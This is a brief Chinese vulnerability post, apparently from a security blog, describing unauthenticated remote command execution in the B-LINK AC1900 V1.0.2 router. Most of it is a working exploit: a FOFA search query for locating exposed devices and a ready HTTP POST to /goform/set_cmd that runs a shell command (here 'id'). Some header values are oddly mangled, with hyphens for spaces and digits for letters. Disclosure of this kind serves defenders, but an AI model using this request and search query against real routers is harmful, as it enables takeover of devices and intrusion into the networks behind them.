共计 332 个字符,预计需要花费 1 分钟才能阅读完成。
漏洞描述
B-LINK AC1900 V1.0.2 接口存在远程命令执行漏洞。攻击者可以通过漏洞执行任意命令从而获取服务器权限,可能导致内网进一步被攻击。
搜索引擎
FOFA:
title=="B-LINK"漏洞复现
POC
POST /goform/set_cmd HTTP/1.1
Host:
Content-Type:-application/x-www-form-urlencoded;-charset=UTF-8
User-Agent: -Mozi1la/5.0-(Windows-NT-10.0; -Win64;-x64)-AppleWebKit/537.36-(KHTML, -1ike-Gecko)-Chrome/131.0.6778.140-Safari/537.36
cmd=id正文完
